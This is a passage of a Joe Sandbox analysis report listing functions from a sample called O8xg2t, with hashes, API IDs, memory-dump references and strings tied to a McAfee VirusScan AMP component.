                                  • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                  • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                  • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise_clrfp
                                  • String ID:
                                  • API String ID: 15204871-0
                                  • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                  • Instruction ID: 6fcbd9363a8492b1145fe2c23ead6b395b885e5e36e3b060233b142135708869
                                  • Instruction Fuzzy Hash: 80B17CB3600B898BEB15CF39C5867ADBBA0F744B48F58C921DA5D877A8CB39D851D700
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 203985260-0
                                  • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                  • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                  • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                  • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                  • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                  • Instruction ID: 752b30ee6a74ca8a5fb752e5dad1cfac5da2586f03e9423cee0e9e56ae9a8e29
                                  • Instruction Fuzzy Hash: AF51C6B2B0868185EF20EF76E8449AF7BA4BB44B94F984135EE5D3BA95CE3CD405C700
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: EntryFunctionLookup
                                  • String ID:
                                  • API String ID: 3852435196-0
                                  • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                  • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                  • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                  • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                  • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                  • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                  • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                  • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                  • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                  • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                  • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                  • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                  • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                  • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                  • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                  • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                  • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                  • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                  • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                  • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                  • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                  • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                  • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                  • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                  • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                  • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                  • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                  • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                  • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                  • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                  • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                  • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                  • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                  • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                  • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                  • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
• Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                  • Instruction ID: 3ebcd1e3d86842839c1dba410951551620a7be1127b368d727b69c627f5226d5
                                  • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                  • Instruction Fuzzy Hash: 68F062B1B192958AEFA49F38E942E2A77D4E748380F988039D68D87B04D63C94608F04

Control-flow Graph
(Graph image of the function at 1400038d0 not reproduced. Recoverable from the graph data: the function calls SetWaitableTimer, then EnterCriticalSection / LeaveCriticalSection around WaitForMultipleObjects, signals with SetEvent / ResetEvent, repeatedly branches to a routine shown in the graph only as #4, and calls the internal functions 140001750 and 140002650 before returning at 140003d35; the executed / not-executed colouring of the basic blocks is lost.)
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                  • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                  • API String ID: 1021822269-3147033232
                                  • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                  • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                  • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                  • API String ID: 883923345-381368982
                                  • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                  • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                  • String ID:
                                  • API String ID: 1613947383-0
                                  • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                  • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                  • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                  • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                  • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 93015348-1041928032
                                  • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                  • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
